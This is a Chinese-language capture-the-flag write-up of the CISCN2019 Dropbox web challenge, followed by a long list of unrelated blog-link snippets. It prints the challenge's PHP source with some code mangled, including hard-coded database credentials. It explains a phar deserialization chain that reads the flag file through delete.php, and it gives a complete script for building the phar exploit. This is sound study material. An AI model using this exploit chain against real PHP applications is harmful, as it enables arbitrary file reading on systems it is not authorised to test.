HyyMbb

[CISCN2019 华北赛区 Day1 Web1]Dropbox

0x01源码

download.php


session_start();
if (!isset($_SESSION['login'])) {
    header("Location: login.php");
    die();
}

if (!isset($_POST['filename'])) {
    die();
}

include "class.php";
ini_set("open_basedir", getcwd() . ":/etc:/tmp");

chdir($_SESSION['sandbox']);
$file = new File();
$filename = (string) $_POST['filename'];
if (strlen($filename) < 40 && $file->open($filename) && stristr($filename, "flag") === false) {
    Header("Content-type: application/octet-stream");
    Header("Content-Disposition: attachment; filename=" . basename($filename));
    echo $file->close();
} else {
    echo "File not exist";
}
?>

upload.php


session_start();
if (!isset($_SESSION['login'])) {
    header("Location: login.php");
    die();
}

include "class.php";

if (isset($_FILES["file"])) {
    $filename = $_FILES["file"]["name"];
    $pos = strrpos($filename, ".");
    if ($pos !== false) {
        $filename = substr($filename, 0, $pos);
    }
    
    $fileext = ".gif";
    switch ($_FILES["file"]["type"]) {
        case 'image/gif':
            $fileext = ".gif";
            break;
        case 'image/jpeg':
            $fileext = ".jpg";
            break;
        case 'image/png':
            $fileext = ".png";
            break;
        default:
            $response = array("success" => false, "error" => "Only gif/jpg/png allowed");
            Header("Content-type: application/json");
            echo json_encode($response);
            die();
    }

    if (strlen($filename) < 40 && strlen($filename) !== 0) {
        $dst = $_SESSION['sandbox'] . $filename . $fileext;
        move_uploaded_file($_FILES["file"]["tmp_name"], $dst);
        $response = array("success" => true, "error" => "");
        Header("Content-type: application/json");
        echo json_encode($response);
    } else {
        $response = array("success" => false, "error" => "Invaild filename");
        Header("Content-type: application/json");
        echo json_encode($response);
    }
}
?>

class.php


error_reporting(0);
$dbaddr = "127.0.0.1";
$dbuser = "root";
$dbpass = "root";
$dbname = "dropbox";
$db = new mysqli($dbaddr, $dbuser, $dbpass, $dbname);

class User {
    public $db;

    public function __construct() {
        global $db;
        $this->db = $db;
    }

    public function user_exist($username) {
        $stmt = $this->db->prepare("SELECT `username` FROM `users` WHERE `username` = ? LIMIT 1;");
        $stmt->bind_param("s", $username);
        $stmt->execute();
        $stmt->store_result();
        $count = $stmt->num_rows;
        if ($count === 0) {
            return false;
        }
        return true;
    }

    public function add_user($username, $password) {
        if ($this->user_exist($username)) {
            return false;
        }
        $password = sha1($password . "SiAchGHmFx");
        $stmt = $this->db->prepare("INSERT INTO `users` (`id`, `username`, `password`) VALUES (NULL, ?, ?);");
        $stmt->bind_param("ss", $username, $password);
        $stmt->execute();
        return true;
    }

    public function verify_user($username, $password) {
        if (!$this->user_exist($username)) {
            return false;
        }
        $password = sha1($password . "SiAchGHmFx");
        $stmt = $this->db->prepare("SELECT `password` FROM `users` WHERE `username` = ?;");
        $stmt->bind_param("s", $username);
        $stmt->execute();
        $stmt->bind_result($expect);
        $stmt->fetch();
        if (isset($expect) && $expect === $password) {
            return true;
        }
        return false;
    }

    public function __destruct() {
        $this->db->close();
    }
}

class FileList {
    private $files;
    private $results;
    private $funcs;

    public function __construct($path) {
        $this->files = array();
        $this->results = array();
        $this->funcs = array();
        $filenames = scandir($path);

        $key = array_search(".", $filenames);
        unset($filenames[$key]);
        $key = array_search("..", $filenames);
        unset($filenames[$key]);

        foreach ($filenames as $filename) {
            $file = new File();
            $file->open($path . $filename);
            array_push($this->files, $file);
            $this->results[$file->name()] = array();
        }
    }

    public function __call($func, $args) {
        array_push($this->funcs, $func);
        foreach ($this->files as $file) {
            $this->results[$file->name()][$func] = $file->$func();
        }
    }

    public function __destruct() {
        $table = '';$table.='';foreach($this->funcsas$func){$table.='';}$table.='';$table.='';foreach($this->resultsas$filename=>$result){$table.='';foreach($resultas$func=>$value){$table.='';}$table.='';$table.='';}echo$table;}}classFile{public$filename;publicfunctionopen($filename){$this->filename=$filename;if(file_exists($filename)&&!is_dir($filename)){returntrue;}else{returnfalse;}}publicfunctionname(){returnbasename($this->filename);}publicfunctionsize(){$size=filesize($this->filename);$units=array(' B',' KB',' MB',' GB',' TB');for($i=0;$size>=1024&&$i<4;$i++)$size/=1024;returnround($size,2).$units[$i];}publicfunctiondetele(){unlink($this->filename);}publicfunctionclose(){returnfile_get_contents($this->filename);}}?>delete.php

session_start();
if (!isset($_SESSION['login'])) {
    header("Location: login.php");
    die();
}

if (!isset($_POST['filename'])) {
    die();
}

include "class.php";

chdir($_SESSION['sandbox']);
$file = new File();
$filename = (string) $_POST['filename'];
if (strlen($filename) < 40 && $file->open($filename)) {
    $file->detele();
    Header("Content-type: application/json");
    $response = array("success" => true, "error" => "");
    echo json_encode($response);
} else {
    Header("Content-type: application/json");
    $response = array("success" => false, "error" => "File not exist");
    echo json_encode($response);
}
?>
index.php

session_start();
if (!isset($_SESSION['login'])) {
    header("Location: login.php");
    die();
}
?>
<!DOCTYPE html>
<html>

<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<title>网盘管理</title>

<head>
    <link href="static/css/bootstrap.min.css" rel="stylesheet">
    <link href="static/css/panel.css" rel="stylesheet">
    <script src="static/js/jquery.min.js"></script>
    <script src="static/js/bootstrap.bundle.min.js"></script>
    <script src="static/js/toast.js"></script>
    <script src="static/js/panel.js"></script>
</head>

<body>
    <nav aria-label="breadcrumb">
    <ol class="breadcrumb">
        <li class="breadcrumb-item active">管理面板</li>
        <li class="breadcrumb-item active"><label for="fileInput" class="fileLabel">上传文件</label></li>
        <li class="active ml-auto"><a href="#">你好  echo $_SESSION['username']?></a></li>
    </ol>
</nav>
<input type="file" id="fileInput" class="hidden">
<div class="top" id="toast-container"></div>


include "class.php";

$a = new FileList($_SESSION['sandbox']);
$a->Name();
$a->Size();
?>
题目分析
首先是我们注册和登录一个账号，然后主要的功能是，上传图片，下载和删除图片~~
 下载图片的时候，可以穿越目录下载源码~~
我们大致看一下源码，看哪儿可以读取源码~~
 在class.php中的函数close()可以读取文件~~
 其中download.php会调用$file->close()但是限制了filename不能包含flag，所以我们不能直接读取flag~~
我们的思路如下~
 
   上传一个phar文件，后缀为图片的格式 
   然后在delete.php中访问它，以phar://test.jpg的形式，此时会调用file->open()中的file_exists()会触发反序列化，（此时file_exists()返回的是false） 
   此时只有user的__descruct会调用close()函数，但是没有回显功能，我们只能找一个有回显的地方进行序列化~ 
   我们观察到FileList类的__descruct有echo函数，输出$table，而$table的内容来自$result，我们再来看一下__call函数~~ 
  
public function __call($func, $args) {
        array_push($this->funcs, $func);
        foreach ($this->files as $file) {
            $this->results[$file->name()][$func] = $file->$func();
        }
    }
__call函数是指当调用类不存在的方法时就会调用__call函数·~
 其中$func就是指我们调用的不存在方法，而$args是指我们的参数~~，
 通过代码我们知道假如我们调用close()方法，那么最后会调用
$file->$func()
即$file->close()，并且存入$result中，那么file_get_contents的内容就能回显出来了~~
最后的payload为：

class User {
    public $db;
}
class FileList {
    private $files;
    private $results;
    private $funcs;
    public function __construct() {
        $file = new File();
        $file->filename = '/flag.txt';
        $this->files = array($file);
        $this->results = array();
        $this->funcs = array();
    }
}
class File {
    public $filename;
}

// ini_set('phar.readonly',0);

@unlink("phar.phar");
$phar = new Phar("phar.phar"); //后缀名必须为phar
$phar->startBuffering();
$phar->setStub(""); //设置stub

$o = new User();
$o->db = new FileList();
$phar->setMetadata($o); //将自定义的meta-data存入manifest
$phar->addFromString("exp.txt", "glzjin"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();
?>
最后再说一下，为什么我们要通过delete.php触发phar反序列化，而不是通过download.php，两者都会调用file_exists()，那是因为download.php有base_dir限制，我们不能读出在/目录下的文件~~

                    
                        
                        
                             
                        
                        
                        
                            
                        
                        
                        
                            
                        
                    
                

        你可能感兴趣的:(BUUCTF刷题记录)
        
            
                
                    JavaScript两个数组的交集 II
                        流落的小鬼

                        刷题记录：JavaScript两个数组的交集II给你两个整数数组nums1和nums2，请你以数组形式返回两数组的交集。输入：nums1=[1,2,2,1],nums2=[2,2]输出：[2,2]varintersect=function(nums1,nums2){varresult=[];vari=0,j=0;nums1.sort((a,b)=>a-b);nums2.sort((a,b)=>a-
                    
                    力扣刷题记录（一）剑指Offer（第二版）
                        乘凉~
求职过程记录leetcode链表算法
                        1、本栏用来记录社招找工作过程中的内容，包括基础知识学习以及面试问题的记录等，以便于后续个人回顾学习；暂时只有2023年3月份，第一次社招找工作的过程；2、个人经历：研究生期间课题是SLAM在无人机上的应用，有接触SLAM、Linux、ROS、C/C++、DJIOSDK等；3、参加工作后（2021-2023年）岗位是嵌入式软件开发，主要是服务器开发，Linux、C/C++、网络编程、docker容
                    
                    BUUCTF 2021-10-4 Pwn
                        Ch1lkat
BUUCTFPwnlinuxpwn
                        文章目录保持手感echo分析EXPPwnme1分析EXPwdb_2018_1st_babyheap分析EXPFSOPhouseoforange_hitcon_2016分析前置知识House_of_orangeFSOPEXPzctf_2016_note3分析EXPgyctf_2020_document分析EXP动态调试复现护网杯_gettingstart分析EXPpicoctf_2018_buffe
                    
                    Leetcode刷题记录分享——数据结构（队列） #200 岛屿数量
                        三年买房不是梦
Leetcode数据结构leetcode数据结构队列bfs
                        Leetcode刷题记录分享——数据结构（队列）PS：刷题两周了，每周天会专门抽出一段时间来刷Leetcode，这学期在学算法设计与分析，根据课程内容，第一周刷动态规划题目，第二周刷的贪心算法。打算从这周开始刷数据结构。数据结构是大二上学期学的了，过去了一年，当时学的也不扎实，现在通过Leetcode理论+实践重新学习一下。我刷Leetcode会先看一下优质解答，肚里没货硬刚也刚不出来，主要是学习
                    
                    Leetcode刷题日记：1-5题篇
                        companion_zhang
力扣刷题记录leetcode算法数据结构c++
                        Leetcode刷题日记：1-5题篇简介题目：一.两数之和二、两数相加三、无重复字符的最长子串四、寻找两个正序数组的中位数五、最长回文子串注简介这个系列将是Leetcode的刷题记录贴，按照题库顺序，每五题为一贴，主要目的做自己的记录、总结之用，但若有同学或同好看到此贴，并有所帮助，也算额外之喜，共勉！题目：一.两数之和给定一个整数数组nums和一个整数目标值target，请你在该数组中找出和为目
                    
                    Leetcode Hot 100刷题记录 -Day9（最大子数和）
                        刘心奶黄包～
leetcode算法数据结构java
                        最大子数和问题描述：给你一个整数数组nums，请你找出一个具有最大和的连续子数组（子数组最少包含一个元素），返回其最大和。子数组是数组中的一个连续部分。示例1：输入：nums=[-2,1,-3,4,-1,2,1,-5,4]输出：6解释：连续子数组 [4,-1,2,1]的和最大，为 6。示例2：输入：nums=[1]输出：1示例3：输入：nums=[5,4,-1,7,8]输出：23//提交版clas
                    
                    代码随想录+力扣刷题记录+华为机考准备记录
                        梁慢慢慢慢
leetcode算法数据结构
                        为了准备华为机考的刷题记录，已压线过背景：数据结构与算法零基础，此前没有刷过题，会Python。学习路线按照代码随想录的顺序刷题，刷题平台：力扣以上大致过了一遍后开始刷华为机考真题（cdsn上购买的真题，刷题平台是购买的真题中的OJ平台，也是ACM模式）总共用时1个月。完成情况：力扣80个题+华为2024年机考真题。大部分题目都只做过1次，掌握得很不牢固，机考的时候也是压线过。时间比较紧急，做到后
                    
                    【NSSCTF】刷题记录——[SWPUCTF 2021 新生赛]系列（CRYPTO篇）
                        SebastianH_
安全
                        新手小白，开启CTF刷题之路（持续更新）此处主要在NSSCTF平台（NSSCTF|在线CTF平台）上开展刷题[SWPUCTF2021新生赛]pigpig附件如下：刚好前段时间刷到到过一篇文章讲猪圈密码的，直接对着看就行[CTF]猪圈密码_ctf猪圈密码_神龙云计算的博客-CSDN博客flag是WHENTHEPIGWANTTOEAT[SWPUCTF2021
                    
                    leetcode刷题记录-两数相加
                        每天都一万遍想吃
leetcode
                        leetcode小白每日做题记录习题集：hot100（c++）题目：第二题两数相加（难度中等）做题思路小白目前只能想到比较直接的方法：本题是采用不带头结点的单链表进行操作的（这里要注意！不然后续的进位计算会出错！！这是我最开始踩的坑）通过对链表中数据的观察，发现只需要维护一个进位变量，这里我采用的是bool型变量，当需要进位时置进位变量st为true，反之为false。由于链l1,l2链表的长度不
                    
                    Leetcode刷题记录 - 链表问题
                        石语予木
leetcode刷题leetcodejava单链表
                        链表问题总结常出现的几种链表问题文章目录链表问题前言问题一：倒数第k个元素问题二：中间位置的结点`问题三：环形链表问题4：未完待续问题5：未完待续前言无法高效获取长度，无法根据偏移快速访问元素，是链表的两个劣势。然而面试的时候经常碰见诸如获取倒数第k个元素，获取中间位置的元素，判断链表是否存在环，判断环的长度等和长度与位置有关的问题。这些问题都可以通过灵活运用双指针来解决。参考链接：https:/
                    
                    【LeetCode】刷题记录--单链表相关
                        DelTTAA
leetcode算法职场和发展
                        21publicListNodemergeTwoLists(ListNodelist1,ListNodelist2){if(list1==null)returnlist2;if(list2==null)returnlist1;ListNoderesult=newListNode(0);ListNodep=result;while(list1!=null&&list2!=null){if(list1
                    
                    leetcode hot 100刷题记录
                        WJX574
leetcode算法数据结构
                        1.两数之和暴力：(还是垃圾暴力版本）classSolution{public:vectortwoSum(vector&nums,inttarget){vectorans;for(inti=0;itwoSum(vector&nums,inttarget){intn=nums.size();for(inti=0;i键值对分别为数组值和数组下标，注意，遍历每一个数组元素，在哈希表里找，没找到的话就将这
                    
                    刷题记录-HOT 100（一）40道
                        Colddd_d
刷题python开发语言
                        记录题解和思路。一、哈希表解决问题1、两数之和思路：创建哈希表：初始化了一个空字典来存储已经访问过的数字及其对应的索引。遍历数组：逐一遍历数组中的每个元素。在遍历过程中，针对每个元素num，计算出它需要的配对数，即target-num。查找配对：检查哈希表中是否存在这个配对数。如果存在，说明找到了目标数对，此时返回这两个数的索引（即哈希表中存储的索引和当前数的索引）。更新哈希表：如果没有找到对应的
                    
                    【hot100篇-python刷题记录】【回文链表】
                        我明天再来学Web渗透
力扣hot100-python链表数据结构python开发语言leetcode算法职场和发展
                        R7-链表篇思路：转回文数组法链表转数组，再使用双指针判断是不是回文数组即可。wkao?!根本不用双指针判断是否回文数组，只需要倒序判断布尔值即可。（牛啊牛啊）#Definitionforsingly-linkedlist.#classListNode:#def__init__(self,val=0,next=None):#self.val=val#self.next=nextclassSolut
                    
                    【hot100篇-python刷题记录】【搜索插入位置】
                        我明天再来学Web渗透
python开发语言算法leetcode
                        R5-二分查找篇二分查找不用教了吧classSolution:defsearchInsert(self,nums:List[int],target:int)->int:left,right=0,len(nums)-1#使得[left,right]区间不为空whileleft<=right:mid=(left+right)//2ifnums[mid]
                    
                    2024.3.25力扣（1200-1400）刷题记录
                        Circusxxx
2024年3月力扣刷题记录leetcode算法python
                        一、1784.检查二进制字符串字段1.使用0分割。分割出来的结果是含有“1”的串和空串。classSolution:defcheckOnesSegment(self,s:str)->bool:#使用0分割returnsum(len(c)!=0forcins.split("0"))bool:#除了前面可以出现0，后面不能出现#1最后出现的位置必须在0第一次出现位置的前面idx_one=0idx_ze
                    
                    【刷题记录】合并两个有序数组、移除元素
                        睡觉待开机
算法数据结构
                        本系列博客为个人刷题思路分享，有需要借鉴即可。1.题目链接：T1：LINKT2：LINK2.详解思路：T1:思路1：弄个新数组，比较两个数组中的值，哪个小就把哪个值放到新数组中。分析1：时间复杂度：O（N）；空间复杂度：O（N）但是显然在本题中题目明确表示要放在原数组中，否定该思路。思路2：把nums2内容拷贝到nums1有效数据的后面，再进行排序分析2：否定，仅排序而言时间复杂度：O（N*log
                    
                    【BUUCTF】[SWPU2019]神奇的二维码
                        shane_seven
ctfwp
                        0x00 刚拿到这题的时候，还以为很简单的样子，结果发现才是一坑接一坑，套娃坑套娃。(出题人友好点儿吧，球球了>_<)0x01 惯例下好文件，是个rar，打开发现是个“神奇的二维码”，直接扫描无果，拿到winhex下查看，发现好几个rar文件 分别手动复制粘贴到新文件，保存，共有四个rar，按照在文件里的位置先后顺序排列 1.rar打开是一行base64编码的字符串，解码后为 打开2.rar，里面
                    
                    BUUCTF misc 专题（127）[UTCTF2020]spectogram
                        tt_npc
安全网络安全音视频
                        下载下来一个音频，拖到au中没啥发现，也听不出来这题需要用到的一个工具是SonicVisualiser，也是看了大佬的博客才知道的DownloadSonicVisualiser打开是这样的一个界面右键选择Layer->AddSpectrogram能很明显看到flagflag{sp3tr0gr4m0ph0n3}
                    
                    BUUCTF msic 专题（128）[ACTF新生赛2020]剑龙
                        tt_npc
网络安全安全
                        下载附件，最后解压出来一张jpg，一个无后缀文件和一个pwd.txt先把无后缀文件拖进010查看一下，看不出来什么。看看明显的pwd.txtaaencode解密jjencode与aaencode解密工具-jjencode解密-aaencode解密-在线工具得到welcom3!;再看看图片，welcom3!;岷县是一个密码那么猜测是steghide隐写应该是需要des解密的密文，但是缺个密钥在图片的
                    
                    BUUCTF misc 专题（30）webshell后门
                        tt_npc
python网络安全安全
                        看题目，又是一道后门查杀的题目，下载了资源以后我们发现是一个rar的文件解压里面的文件后打开D盾进行后门查杀在这里找到了，并根据路径打开所在的文件夹，找到文件根据题目提示，我们在这里找到了md5再根据md5中的pass我们可以找到pass包上flag就是答案了flag{ba8e6c6f35a53933b871480bb9a9545c}
                    
                    BUUCTF misc 专题（126）voip
                        tt_npc
安全网络安全音视频
                        下载附件，是一个流量包，wireshark打开分析协议分级发现都是RTP流，也不是很懂，上网搜了一下，发现是一种语音通话技术然后wireshark中有电话的选项，可以选中分析rtp流，并且播放播放的音频就是flag，flag{9001IVR}
                    
                    BUUCTF misc 专题（11）wireshark
                        tt_npc
wireshark测试工具网络网络安全
                        读题，很明显，这是一波带领你收集工具的题目，就是wiresharkWireshark·Downloadhttps://www.wireshark.org/download.html先是对wireshark的下载和安装下载好题目资源以后进行解压，直接拖入到wireshark中由题知，管理员的密码就是答案那么我们直接用http.request.method=="POST"滤出post就行让我们再用TC
                    
                    buuctf-misc-[SWPU2019]神奇的二维码1
                        mlws1900
buuctfmiscctfjavaservletjvmctf
                        下载附件，看到一个二维码利用二维码工具进行扫码，获得信息flag不在此，用winhex打开观察到多个rar文件和类似base64编码的内容看到最后看到一个mp3文件，开始文件分离（用windows系统的foremost无法分离文件）用kali的binwalk进行分离发现四个rar文件一一打开查看第一个rar文件打开一个图片和一个无法打开的f图片第二个rar文件YXNkZmdoamtsMTIzNDU
                    
                    BUUCTF [SWPU2019]神奇的二维码 1
                        玥轩_521
BUUCTFMISC安全CTF笔记网络安全BUUCTFMisc
                        BUUCTF:https://buuoj.cn/challenges题目描述：得到的flag请包上flag{}提交。密文：下载附件，得到一个.png图片。解题思路：1、使用QRresearch扫一下，得到“swpuctf{flag_is_not_here}”的提示。2、放到010Editor中看一下，没找到什么明显的特征。使用Kali中的binwalk工具进行检测，发现四个rar压缩包。使用bin
                    
                    BUUCTF misc 专题（47）[SWPU2019]神奇的二维码
                        tt_npc
网络安全安全python
                        下载附件，得到一张二维码图片，并用工具扫描（因为图片违规了，所以就不放了哈。工具的话，一般的二维码扫描都可以）swpuctf{flag_is_not_here}，（刚开始出了点小差错对不住各位师傅）根据提示知道答案并不在这里，拖入winhex进行查看搜索出多个Rar，将文件放入kali进行binwalk分离出了多个rar，先查看txt文档中的内容YXNkZmdoamtsMTIzNDU2Nzg5MA
                    
                    【BUUCTF 加固题】Ezsql 速通
                        hacker-routing
webCTF夺旗赛开发语言前端javascriptweb安全htmlphpCTF
                        博主介绍‍博主介绍：大家好，我是hacker-routing，很高兴认识大家~✨主攻领域：【渗透领域】【应急响应】【Java】【VulnHub靶场复现】【面试分析】点赞➕评论➕收藏==养成习惯（一键三连）欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋作者水平有限，欢迎各位大佬指点，相互学习进步！目录前言一、访问web网址二、ssh远程登录三、加固网站源代码前言靶机地址解释：第一行：目标机器WEB服
                    
                    ctf刷题 ctfshow【网鼎杯】
                        路向阳_
CTF学习网络安全
                        Php-3、java-3、目录一、网鼎杯-青龙组-web--AreUserialZ1、源码见下：serialzcopy3、绕过语法详解：4、尝试绕过：二、php特性三、php反序列化漏洞四、Buuctf一、网鼎杯-青龙组-web--AreUserialZBuuctf1、源码见下：serialzcopyPhp反序列化：思路：先阅读源码，在分析思路//大致思路：新建一个对象filenameflag.p
                    
                    【Web】CTFSHOW java刷题记录(全)
                        Z3r4y
javactfshowstruts2strutsrcecveweb
                        目录web279web280web281web282web283web284web285web286web287web288web289web290web291web292web293web294web295web296web297web298web299web300web279题目提示url里告诉我们是S2-001直接进行一个exp的搜S2-001漏洞分析-CSDN博客payload:%{#a=
                    
                    【刷题记录】移除链表元素
                        睡觉待开机
链表数据结构
                        本系列博客为个人刷题思路分享，有需要借鉴即可。注：部分思路借鉴自程序员小熊链接：https://leetcode.cn/problems/remove-linked-list-elements/solutions/341875/203-yi-chu-lian-biao-yuan-su-you-ya-di-gui-c-yu-ya/来源：力扣（LeetCode）1.目录大纲：2.题目链接：T1：LIN
                    
                                Java序列化进阶篇
                                    g21121
java序列化
                                            1.transient 
        类一旦实现了Serializable 接口即被声明为可序列化，然而某些情况下并不是所有的属性都需要序列化，想要人为的去阻止这些属性被序列化，就需要用到transient 关键字。 

                                
                                escape()、encodeURI()、encodeURIComponent()区别详解 
                                    aigo
JavaScriptWeb
                                    原文：http://blog.sina.com.cn/s/blog_4586764e0101khi0.html 
  
JavaScript中有三个可以对字符串编码的函数，分别是： escape,encodeURI,encodeURIComponent，相应3个解码函数：,decodeURI,decodeURIComponent 。 
下面简单介绍一下它们的区别 
1 escape()函
                                
                                ArcgisEngine实现对地图的放大、缩小和平移
                                    Cb123456
添加矢量数据对地图的放大、缩小和平移Engine
                                    ArcgisEngine实现对地图的放大、缩小和平移: 
 个人觉得是平移，不过网上的都是漫游，通俗的说就是把一个地图对象从一边拉到另一边而已。就看人说话吧. 
 具体实现: 
一、引入命名空间 
   using ESRI.ArcGIS.Geometry; 
   using ESRI.ArcGIS.Controls; 
二、代码实现.
                                
                                Java集合框架概述
                                    天子之骄
Java集合框架概述
                                       集合框架 
集合框架可以理解为一个容器，该容器主要指映射(map)、集合(set)、数组(array)和列表(list)等抽象数据结构。 
从本质上来说，Java集合框架的主要组成是用来操作对象的接口。不同接口描述不同的数据类型。 
  
简单介绍： 
  
Collection接口是最基本的接口，它定义了List和Set，List又定义了LinkLi
                                
                                旗正4.0页面跳转传值问题
                                    何必如此
javajsp
                                    跳转和成功提示 
a)        成功字段非空forward 
成功字段非空forward，不会弹出成功字段，为jsp转发，页面能超链接传值,传输变量时需要拼接。接拼接方式list.jsp?test="+strweightUnit+"或list.jsp?test="+weightUnit+&qu
                                
                                全网唯一:移动互联网服务器端开发课程
                                    cocos2d-x小菜
web开发移动开发移动端开发移动互联程序员
                                        移动互联网时代来了！     App市场爆发式增长为Web开发程序员带来新一轮机遇，近两年新增创业者，几乎全部选择了移动互联网项目！传统互联网企业中超过98%的门户网站已经或者正在从单一的网站入口转向PC、手机、Pad、智能电视等多端全平台兼容体系。据统计，AppStore中超过85%的App项目都选择了PHP作为后端程
                                
                                Log4J通用配置|注意问题 笔记
                                    7454103
DAOapachetomcatlog4jWeb
                                    关于日志的等级 那些去 百度就知道了！ 
这几天 要搭个新框架  配置了 日志 记下来 ！做个备忘！ 
 

 #这里定义能显示到的最低级别,若定义到INFO级别,则看不到DEBUG级别的信息了~!
log4j.rootLogger=INFO,allLog

# DAO层 log记录到dao.log 控制台 和 总日志文件
log4j.logger.DAO=INFO,dao,C
                                
                                SQLServer TCP/IP 连接失败问题 ---SQL Server Configuration Manager
                                    darkranger
sqlcwindowsSQL ServerXP
                                    当你安装完之后,连接数据库的时候可能会发现你的TCP/IP 没有启动.. 
发现需要启动客户端协议 : TCP/IP  
需要打开 SQL Server Configuration Manager... 
却发现无法打开 SQL Server Configuration Manager..?? 
 
解决方法:  C:\WINDOWS\system32目录搜索framedyn.
                                
                                [置顶] 做有中国特色的程序员
                                    aijuans
程序员
                                    从出版业说起   网络作品排到靠前的，都不会太难看，一般人不爱看某部作品也是因为不喜欢这个类型，而此人也不会全不喜欢这些网络作品。究其原因，是因为网络作品都是让人先白看的，看的好了才出了头。而纸质作品就不一定了，排行榜靠前的，有好作品，也有垃圾。   许多大牛都是写了博客，后来出了书。这些书也都不次，可能有人让为不好，是因为技术书不像小说，小说在读故事，技术书是在学知识或温习知识，有些技术书读得可
                                
                                document.domain 跨域问题
                                    avords
document
                                    document.domain用来得到当前网页的域名。比如在地址栏里输入：javascript:alert(document.domain); //www.315ta.com我们也可以给document.domain属性赋值，不过是有限制的，你只能赋成当前的域名或者基础域名。比如：javascript:alert(document.domain = "315ta.com"); 
                                
                                关于管理软件的一些思考
                                    houxinyou
管理
                                      
工作好多看年了,一直在做管理软件,不知道是我最开始做的时候产生了一些惯性的思维,还是现在接触的管理软件水平有所下降.换过好多年公司,越来越感觉现在的管理软件做的越来越乱. 
在我看来,管理软件不论是以前的结构化编程,还是现在的面向对象编程,不管是CS模式,还是BS模式.模块的划分是很重要的.当然,模块的划分有很多种方式.我只是以我自己的划分方式来说一下. 
做为管理软件,就像现在讲究MVC这
                                
                                NoSQL数据库之Redis数据库管理(String类型和hash类型)
                                    bijian1013
redis数据库NoSQL
                                    一.Redis的数据类型 
1.String类型及操作 
        String是最简单的类型，一个key对应一个value，string类型是二进制安全的。Redis的string可以包含任何数据，比如jpg图片或者序列化的对象。 
        Set方法：设置key对应的值为string类型的value 
                                
                                Tomcat 一些技巧
                                    征客丶
javatomcatdos
                                    以下操作都是在windows 环境下 
 
一、Tomcat 启动时配置 JAVA_HOME 
在 tomcat 安装目录，bin 文件夹下的 catalina.bat 或 setclasspath.bat 中添加 
 
set JAVA_HOME=JAVA 安装目录 
set JRE_HOME=JAVA 安装目录/jre 
 
即可； 
 
二、查看Tomcat 版本 
在 tomcat 安装目
                                
                                【Spark七十二】Spark的日志配置
                                    bit1129
spark
                                    在测试Spark Streaming时，大量的日志显示到控制台，影响了Spark Streaming程序代码的输出结果的查看(代码中通过println将输出打印到控制台上)，可以通过修改Spark的日志配置的方式，不让Spark Streaming把它的日志显示在console 
  
在Spark的conf目录下，把log4j.properties.template修改为log4j.p
                                
                                Haskell版冒泡排序
                                    bookjovi
冒泡排序haskell
                                    面试的时候问的比较多的算法题要么是binary search，要么是冒泡排序，真的不想用写C写冒泡排序了，贴上个Haskell版的，思维简单，代码简单，下次谁要是再要我用C写冒泡排序，直接上个haskell版的，让他自己去理解吧。 
  
  
sort [] = []
sort [x] = [x]
sort (x:x1:xs)
    | x>x1 = x1:so
                                
                                java 路径 配置文件读取
                                    bro_feng
java
                                    这几天做一个项目，关于路径做如下笔记，有需要供参考。 
 
取工程内的文件，一般都要用相对路径，这个自然不用多说。 
 
在src统计目录建配置文件目录res,在res中放入配置文件。 
读取文件使用方式： 
1. MyTest.class.getResourceAsStream("/res/xx.properties") 
2. properties.load(MyTest.
                                
                                读《研磨设计模式》-代码笔记-简单工厂模式
                                    bylijinnan
java设计模式
                                    声明： 本文只为方便我个人查阅和理解，详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ 
 
 


package design.pattern;

/*
 * 个人理解：简单工厂模式就是IOC;
 * 客户端要用到某一对象，本来是由客户创建的，现在改成由工厂创建，客户直接取就好了
 */
interface IProduct {
	
                                
                                SVN与JIRA的关联
                                    chenyu19891124
SVN
                                    SVN与JIRA的关联一直都没能装成功，今天凝聚心思花了一天时间整合好了。下面是自己整理的步骤： 
一、搭建好SVN环境，尤其是要把SVN的服务注册成系统服务 
二、装好JIRA，自己用是jira-4.3.4破解版 
三、下载SVN与JIRA的插件并解压，然后拷贝插件包下lib包里的三个jar，放到Atlassian\JIRA 4.3.4\atlassian-jira\WEB-INF\lib下，再
                                
                                JWFDv0.96 最新设计思路
                                    comsci
数据结构算法工作企业应用公告
                                                       
 
 
随着工作流技术的发展，工作流产品的应用范围也不断的在扩展，开始进入了像金融行业(我已经看到国有四大商业银行的工作流产品招标公告了)，实时生产控制和其它比较重要的工程领域，而
                                
                                vi 保存复制内容格式粘贴
                                    daizj
vi粘贴复制保存原格式不变形
                                        vi是linux中非常好用的文本编辑工具，功能强大无比，但对于复制带有缩进格式的内容时，粘贴的时候内容错位很严重，不会按照复制时的格式排版，vi能不能在粘贴时，按复制进的格式进行粘贴呢？ 答案是肯定的，vi有一个很强大的命令可以实现此功能 。 
 
    在命令模式输入:set paste，则进入paste模式，这样再进行粘贴时
                                
                                shell脚本运行时报错误：/bin/bash^M: bad interpreter 的解决办法
                                    dongwei_6688
shell脚本
                                    出现原因：windows上写的脚本，直接拷贝到linux系统上运行由于格式不兼容导致 
解决办法： 
 1. 比如文件名为myshell.sh，vim myshell.sh 
 2. 执行vim中的命令 : set ff?查看文件格式，如果显示fileformat=dos，证明文件格式有问题 
 3. 执行vim中的命令 :set fileformat=unix 将文件格式改过来就可以了，然后:w
                                
                                高一上学期难记忆单词
                                    dcj3sjt126com
wordenglish
                                    honest 诚实的；正直的 
argue 争论 
classical 古典的 
hammer 锤子 
share  分享；共有 
sorrow 悲哀；悲痛 
adventure 冒险 
error 错误；差错 
closet 壁橱；储藏室 
pronounce 发音；宣告 
repeat 重做；重复 
majority 大多数；大半 
  
native 本国的，本地的，本国
                                
                                hibernate查询返回DTO对象，DTO封装了多个pojo对象的属性
                                    frankco
POJOhibernate查询DTO
                                          DTO-数据传输对象；pojo-最纯粹的java对象与数据库中的表一一对应。 
      简单讲：DTO起到业务数据的传递作用，pojo则与持久层数据库打交道。 
  
      有时候我们需要查询返回DTO对象，因为DTO
                                
                                Partition List
                                    hcx2013
partition
                                    Given a linked list and a value x, partition it such that all nodes less than x come before nodes greater than or equal to x. 
You should preserve the original relative order of th
                                
                                Spring MVC测试框架详解——客户端测试
                                    jinnianshilongnian

